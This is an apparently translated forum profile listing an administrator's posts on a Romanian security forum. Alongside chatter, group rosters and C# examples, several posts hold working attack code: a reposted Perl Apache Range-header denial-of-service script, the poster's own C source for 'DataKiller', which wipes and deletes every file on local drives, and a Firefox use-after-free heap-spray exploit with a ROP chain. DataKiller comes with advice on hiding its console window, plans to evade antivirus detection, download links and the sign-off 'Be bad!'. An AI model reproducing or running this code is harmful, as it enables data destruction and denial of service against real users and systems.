Nytro

Administrators
  • Posts: 18725
  • Days Won: 706

Everything posted by Nytro

  1. Off-topic, don't ruin the thread.
  2. Update: DataKiller v0.2 What's new: - Safe file delete. See the first post for more information.
  3. I don't know if signatures are worth it, but if anyone needs graphics, images or anything else for a project, I think the Designers will be happy to help.
  4. Nytro

    geoRAT 3.0

    And just like that we have a new VIP.
  5. Apache httpd Remote Denial of Service (memory exhaustion)

        #Apache httpd Remote Denial of Service (memory exhaustion)
        #By Kingcope
        #Year 2011
        #
        # Will result in swapping memory to filesystem on the remote side
        # plus killing of processes when running out of swap space.
        # Remote System becomes unstable.
        #

        use IO::Socket;
        use Parallel::ForkManager;

        sub usage {
            print "Apache Remote Denial of Service (memory exhaustion)\n";
            print "by Kingcope\n";
            print "usage: perl killapache.pl <host> [numforks]\n";
            print "example: perl killapache.pl www.example.com 50\n";
        }

        sub killapache {
            print "ATTACKING $ARGV[0] [using $numforks forks]\n";

            $pm = new Parallel::ForkManager($numforks);

            $|=1;
            srand(time());
            $p = "";
            for ($k=0;$k<1300;$k++) {
                $p .= ",5-$k";
            }

            for ($k=0;$k<$numforks;$k++) {
                my $pid = $pm->start and next;

                $x = "";
                my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                                 PeerPort => "80",
                                                 Proto    => 'tcp');

                $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
                print $sock $p;

                while(<$sock>) {
                }
                $pm->finish;
            }
            $pm->wait_all_children;
            print ":pPpPpppPpPPppPpppPp\n";
        }

        sub testapache {
            my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                             PeerPort => "80",
                                             Proto    => 'tcp');

            $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
            print $sock $p;

            $x = <$sock>;
            if ($x =~ /Partial/) {
                print "host seems vuln\n";
                return 1;
            } else {
                return 0;
            }
        }

        if ($#ARGV < 0) {
            usage;
            exit;
        }

        if ($#ARGV > 1) {
            $numforks = $ARGV[1];
        } else {$numforks = 50;}

        $v = testapache();
        if ($v == 0) {
            print "Host does not seem vulnerable\n";
            exit;
        }
        while(1) {
            killapache();
        }

    Looks promising...

    Source: Apache httpd Remote Denial of Service (memory exhaustion)
  6. Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube
  7. I did think about the option of excluding the Windows partition. But there may be other files there too. I think I'll add an option to skip ?:/Windows and ?:/Program Files, since Documents And Settings still holds data, as does /Users on Windows 7. But I think I'm complicating things for nothing. I'll think about it some more, and when I have more free time I'll work on it further.
  8. Whoever wants to be recruited into that group, add "grupuri_rst" and we'll talk. And we'll also see how much they understand of what they are doing.
  9. It won't "cause a sensation", it will just be more complex and more useful. I'm waiting for ideas and suggestions; as for the implementation, those in the C/C++ coder group will be able to contribute.
  10. No, VIP is something else.
  11. Yes, I'm sure that if they see "[G] Java Programmer" instead of "Java Programmers", even if it's the first time they visit RST they'll say: "Aaah, right, now I know, it's about those groups I don't know about, but "G" comes from groups and that cleared it up for me". There's no point; maybe I'll add italics, a distinct style for them, but for now it isn't necessary.
  12. "Registered user" != "Java Programmer" != "VIP". Even if you have a child who can't read look at it, they will realize it's not the same thing. PS: Those with the VIP rank now have the group status (Linux...), but also the VIP permissions.
  13. Name: DataKiller
    Description: Deletes all files
    Author: The C/C++ Coder group @ Romanian Security Team
    Size: 8.5 KB

    Warning! Do not run this executable, it will try to delete all files!

    A more detailed description: some time ago, someone asked me for a program like this and it seemed like an interesting idea. This is the second version; I plan to add a few useful options to it (to delete only pictures, for example).

    What's new:
    - Safe File Delete

    It's nothing complicated, but it can be very useful. The only thing it does is replace all the data in the files that are about to be deleted with NULL. So a file that contains "aaa" will contain "NULL,NULL,NULL" and will then be deleted. In case you didn't know, when you Delete a file, the data in the file is not erased; only the link to that file is removed, while the data remains on the hard disk and can be partially or fully recovered. With this option, it can no longer be recovered, but the program will take MUCH longer to run and will use more resources. It will take over 30 minutes, depending on the size and number of files on the computer. I estimate that a run would take about 1-2 hours.

    And I have a few ideas for the future anyway. It's the only option implemented, but as you can see in the source I have a few more ideas to put into practice.

    There's no point in hiding the source code; the problem is that it isn't extraordinarily well written, I didn't make an effort to optimize it.

    DataKiller.c

        /*
            Name: DataKiller.c
            Description: Delete all deleteable files
            Authors: The C/C++ Coder group @ Romanian Security Team
            Info: Not all options have been implemented
        */

        #include <windows.h>
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>

        /* User-defined settings - you can change the values */

        int safe_file_delete = 1;            /* "-[n]sf" Delete the file so that it cannot be recovered */
        int safe_delete_file_info = 0;       /* "-[n]si" Also delete the information about the file */
        int delete_all_files = 1;            /* "-[n]da" Delete all files */
        int delete_all_images = 1;           /* "-[n]di" Delete all images */
        int delete_all_media = 1;            /* "-[n]dm" Delete all songs and videos */
        int delete_all_documents = 1;        /* "-[n]dd" Delete all documents */
        int exclude_windows_partition = 0;   /* "-[n]ew" Do not delete anything from the Windows partition */

        /* Buffer sizes */

        #define VOLNAME_SIZE 4
        #define VOLBUFFER_SIZE 1337
        #define DIRBUFFER_SIZE 255
        #define FILENAME_SIZE 31337

        /* Counters for the number of files and folders - statistics */

        int nr_files = 0;
        int nr_directories = 0;
        int deleted_files = 0;
        int deleted_directories = 0;

        /* The function replaces the data in a file with 0 (NULL) */

        void NullFile(const char *fisier)
        {
            HANDLE hFisier = NULL;
            DWORD file_size = 0;
            DWORD file_size_2 = 0, written = 0;
            unsigned char *buf = NULL;

            SetFileAttributes(fisier, FILE_ATTRIBUTE_NORMAL);

            hFisier = CreateFile(fisier, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING,
                                 FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_NORMAL |
                                 FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL);

            if(hFisier != INVALID_HANDLE_VALUE)
            {
                file_size = GetFileSize(hFisier, &file_size_2);

                /* Null out the file so that the data cannot be recovered */

                buf = (unsigned char *)malloc(file_size);
                memset(buf, 0, file_size);

                WriteFile(hFisier, buf, file_size, &written, NULL);

                free(buf);
                CloseHandle(hFisier);
            }
        }

        /* Recursive function, deletes the folders and files */

        void DeleteFiles(char *directory)
        {
            WIN32_FIND_DATA file_data;
            HANDLE hFisier;
            int new_file = 1;
            char dir_buffer[DIRBUFFER_SIZE] = {0};
            char file_name[FILENAME_SIZE] = {0};
            char new_dir[DIRBUFFER_SIZE] = {0};

            /* Build the string for FindFirstFile */

            memset(&file_data, 0, sizeof(WIN32_FIND_DATA));
            sprintf(dir_buffer, "%s*", directory);

            hFisier = FindFirstFile(dir_buffer, &file_data);

            /* Walk the folder */

            while(hFisier != INVALID_HANDLE_VALUE && new_file)
            {
                sprintf(file_name, "%s%s", directory, file_data.cFileName);

                /* If it is a folder */

                if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) && (GetFileAttributes(file_name) != (unsigned)-1))
                {
                    sprintf(new_dir, "%s\\", file_name);

                    /* Skip "." and ".." */

                    if(file_name[strlen(file_name) - 1] != '.')
                    {
                        nr_directories++;
                        DeleteFiles(new_dir);
                        if(RemoveDirectory(new_dir)) deleted_directories++;
                    }
                }

                /* If it is a file */

                else
                {
                    nr_files++;
                    if(safe_file_delete) NullFile(file_name);
                    if(DeleteFile(file_name)) deleted_files++;
                }

                /* Move on to the next file/folder */

                new_file = FindNextFile(hFisier, &file_data);
            }

            FindClose(hFisier);
        }

        int main(int argc, char *argv[])
        {
            char *dir_buffer = NULL;
            char **drives = NULL;
            int dir_buf_size = 0, nr_drives = 0, i = 0, a = 0;

            /* Check the command-line parameters */

            if(argc > 1)
            {
                for(a = 1; a < argc; a++)
                {
                    /* Take each parameter in turn */

                    if(strcmp(argv[a], "-sf") == 0) safe_file_delete = 1;
                    else if(strcmp(argv[a], "-nsf") == 0) safe_file_delete = 0;
                    else if(strcmp(argv[a], "-si") == 0) safe_delete_file_info = 1;
                    else if(strcmp(argv[a], "-nsi") == 0) safe_delete_file_info = 0;
                    else if(strcmp(argv[a], "-da") == 0) delete_all_files = 1;
                    else if(strcmp(argv[a], "-nda") == 0) delete_all_files = 0;
                    else if(strcmp(argv[a], "-di") == 0) delete_all_images = 1;
                    else if(strcmp(argv[a], "-ndi") == 0) delete_all_images = 0;
                    else if(strcmp(argv[a], "-dm") == 0) delete_all_media = 1;
                    else if(strcmp(argv[a], "-ndm") == 0) delete_all_media = 0;
                    else if(strcmp(argv[a], "-dd") == 0) delete_all_documents = 1;
                    else if(strcmp(argv[a], "-ndd") == 0) delete_all_documents = 0;
                    else if(strcmp(argv[a], "-ew") == 0) exclude_windows_partition = 1;
                    else if(strcmp(argv[a], "-new") == 0) exclude_windows_partition = 0;
                }
            }

            /* Allocate memory */

            dir_buffer = (char *)malloc(VOLBUFFER_SIZE);
            dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer);

            nr_drives = dir_buf_size / VOLNAME_SIZE;
            drives = (char **)malloc(sizeof(char *) * nr_drives);

            /* Walk the volumes */

            for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++)
            {
                drives[i] = (char *)malloc(VOLNAME_SIZE);
                strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE);

                printf("Drive: %s: %d\n", drives[i], GetDriveType(drives[i]));

                if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE) DeleteFiles(drives[i]);
            }

            printf("Foldere: %d\nFisiere: %d\n", nr_directories, nr_files);
            printf("Foldere sterse: %d\nFisiere sterse: %d\n", deleted_directories, deleted_files);

            /* Free the memory */

            for(i = 0; i < nr_drives; i++) free(drives[i]);
            free(drives);
            free(dir_buffer);

            return 0;
        }

    Pastebin: [C] DataKiller.c - Pastebin.com

    If you want to compile it, compile it with the "-mwindows" linker option, so that CMD doesn't open when it is run. I also compiled it with the size optimizations "-s" and "-Os".

    Usage? I think you'll find one for it yourselves; I think there will be plenty who find it "useful".

    The bad part, from what I can see, is that it's detectable...
    http://www.virustotal.com/file-scan/report.html?id=b0d3d314fa0de3e4041e16525017a7960641a089cd7bf5a887ccb9ec53d935df-1313949171
    I'll work on this aspect too. The point is that you can compile it from source, so don't think I posted something else.

    Download:
    http://www.girlshare.ro/2529741.5
    http://www.speedyshare.com/files/29969756/DataKiller.exe
    http://www.megaupload.com/?d=S88LSQH1
    http://www.mediafire.com/?ti4gvi9nnj7g91q
    http://www.multiupload.com/DOTY3PVTX3

    I know, it's trivial, stupid and unethical; I don't need something like this, but maybe some people do.

    Be bad!
  14. Keyscrambler?
  15. New group members:
    - sql.breaker - PHP
    - Usr6 - Malware analyzer
    - Gabriel87 - Designer
    - gigaevil - C++ Coder

    Temporary change: the Web Designer group is part of the Designer group.

    The list so far, with everyone:

    PHP Coder
    - Synthesis - Leader
    - GarryOne - Member
    - sql.breaker - Member

    Java Programmer
    - M2G - Leader
    - em - Member

    Linux Administrator
    - Zatarra - Leader
    - BGS - Member
    - Spock - Member
    - adonisslanic - Member

    VB6 Programmer
    - Wav3 - Leader

    Malware analyzer
    - Paul4Games
    - Usr6

    Windows Administrator
    - wildchild - Leader

    Python Coder
    - cmin - Leader
    - python3 - Member

    Designer
    - Surge - Leader
    - robertutzu
    - Gabriel87

    .NET Programmer
    - Alien - Leader

    C/C++ Programmer
    - Nytro - Leader
    - Pantrunjel - Member
    - gigaevil - Member

    All leaders are asked to contact me so we can talk about projects and future plans.
  16. I tried it on Windows 7, but with Mozilla 3.6.15, and it crashed without executing the shellcode.
  17. Wordpress plugins exploits

    Author: Exploits by Miroslav Stampar « Exploit Database

    List:
    WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability
    WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability
    WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability
    WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability
    WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability
    WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
    WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
    WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability
    WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability
    WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi
    WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability

    Source: Exploits by Miroslav Stampar « Exploit Database
  18. Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)

        <html>
        <body>
        <applet code="rubik.class" width=140 height=140></applet>
        <p><b>Mozilla mChannel Object use after free</b><br />
        - Found by regenrecht<br />
        - MSF exploit by Rh0<br />
        - Win 7 fun version by mr_me</p>
        <!--
        Notes:
        - This exploit requires <= java 6 update 25.
        - optimized heap spray and still works on multiple tabs as the spray is large enough to hit the 0x10000000 block.
        - If you really want the class file you can get it here: http://javaboutique.internet.com/Rubik/rubik.class, but java still loads without it.
        - Tested on windows 7 ultimate (latest updates).
        - http://bit.ly/qD4Jkc
        -->
        <object id="d"><object>
        <script type="text/javascript">

        function trigger(){
            alert('ready?');

            fakeobject = document.getElementById("d");                              // allocate the object
            fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink);  // append to the objects available functions
            fakeobject.onChannelRedirect(null,new Object,0);                        // free it

            /*
            fill the object with a fake vtable reference
            just use the start of a block for simplicity and use \x00
            because it expands to a NULL so that
            when we have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
            */
            fakevtable = unescape("\x00%u1000");

            var rop = "";
            // 3 instructions to pivot cleanly
            rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
            rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
            rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>
            // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
            rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
            rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
            rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN
            rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler)
            rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
            rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect()
            rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN
            rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location
            rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
            rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler)
            rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI
            rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler)
            rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN
            rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret '
            rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
            rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed
            rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN
            rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN
            rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx
            rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN
            rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
            rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN
            rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx)
            rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN
            rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi)
            rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN
            rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx
            rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN
            rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
            rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
            rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN

            sc = rop;
            // nice big 'calccode' (0x400 bytes)
            sc += unescape("[encoded payload omitted]");

            // create a string with a ptr to the offset of our rop
            // used 0x1000001c to accommodate 0x18 + 0x4 (1st rop gadget)
            var filler = unescape("%u001c%u1000");
            while(filler.length < 0x100) {filler += filler;}

            /*
            create a string with 0x18 bytes at the start containing ptr's to the rop.
            This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
            Then fill with sc + junk
            */
            var chunk = filler.substring(0,0x18/2);
            chunk += sc;
            chunk += filler;

            // create a string of size 64k in memory that contains sc + filler
            var heapblock = chunk.substring(0,0x10000/2);

            // keep adding more memory that contains sc + filler to reach 512kB
            while (heapblock.length<0x80000) {heapblock += heapblock;}

            /*
            using a final string of 512kB so that the spray is fast but ensuring accuracy
            - sub the block header length (0x24)
            - sub 1/4 of a page for sc (0x400)
            - sub the string length (0x04)
            - sub the null byte terminator
            */
            var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);

            // optimised spray, precision can still be reliable even with tabs.
            // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
            arrayOfHeapBlocks = new Array()
            for (n=0;n<0x80;n++){
                arrayOfHeapBlocks[n] = finalspray + sc;
            }
        }

        trigger();
        </script>
        </body>
        </html>

    Does anyone have an older version of Mozilla to test it with? If I don't forget, I'll test it myself when I get home; I think there are plenty of people who have old versions of Mozilla.

    Source: Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
  19. It depends on the person; I for one would be satisfied with something like this, I need at most 1 GB of RAM, a 2.5 GHz processor and a video card worth 2 lei. But I don't play games, apart from a Counter-Strike once in a blue moon. If you're not a gamer and you don't want who knows what from a computer, as I for example don't, it's good.
  20. I don't like this nonsense; you can put it in your status on messenger or on Facebook, not here.
  21. Yes it is, that one is much more complex and there are other solutions too; I was looking for someone to discuss such things with, and this program is a good starting point.
  22. Post another link. PS: I'm going to pester you to give me pieces of the source and I'll ask you a few questions
  23. Nytro

    C# by example

    Lots of examples for various actions. Examples:

        using System;
        public class HelloWorld
        {
            public static void Main(string[] args) {
                Console.Write("Hello World!");
            }
        }

        using System;
        namespace PlayingAround {
            class ReadAll {
                public static void Main(string[] args) {
                    string contents = System.IO.File.ReadAllText(@"C:\t1");
                    Console.Out.WriteLine("contents = " + contents);
                }
            }
        }

        // requires: using System.IO;
        public static string getFileAsString(string fileName) {
            StreamReader sReader = null;
            string contents = null;
            try {
                FileStream fileStream = new FileStream(fileName, FileMode.Open, FileAccess.Read);
                sReader = new StreamReader(fileStream);
                contents = sReader.ReadToEnd();
            } finally {
                if(sReader != null) {
                    sReader.Close();
                }
            }
            return contents;
        }

        using System;
        namespace PlayingAround {
            class ReadAll {
                public static void Main(string[] args) {
                    string[] lines = System.IO.File.ReadAllLines(@"C:\t1");
                    Console.Out.WriteLine("contents = " + lines.Length);
                    Console.In.ReadLine();
                }
            }
        }

        // requires: using System; using System.IO;
        StreamReader sr = new StreamReader("fileName.txt");
        string line;
        while((line= sr.ReadLine()) != null) {
            Console.WriteLine("xml template:"+line);
        }
        if (sr != null)sr.Close(); //should be in a "finally" or "using" block

        using System;
        namespace PlayingAround {
            class ReadAll {
                public static void Main(string[] args) {
                    string myText = "Line1" + Environment.NewLine + "Line2" + Environment.NewLine;
                    System.IO.File.WriteAllText(@"C:\t2", myText);
                }
            }
        }

        using System;
        using System.IO;

        public class WriteFileStuff {
            public static void Main() {
                FileStream fs = new FileStream("c:\\tmp\\WriteFileStuff.txt", FileMode.OpenOrCreate, FileAccess.Write);
                StreamWriter sw = new StreamWriter(fs);
                try {
                    sw.WriteLine("Howdy World.");
                } finally {
                    if(sw != null) { sw.Close(); }
                }
            }
        }

    Anyway, there are a great many of them, with highlighted syntax ("syntax highlight", in Romanian): http://www.fincher.org/tips/Languages/csharp.shtml
  24. Via Google, I don't know Delphi: Disable LogOff, TaskManager and ShutDown on Win NT systems (2000/XP) Task Manager - Delphi Pages Forums. You have to write, in the Registry under "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", the key "DisableTaskMgr" with the value 1.
  25. Those I haven't talked with yet, more precisely those of you who haven't added me to your list, give a sign and we'll talk.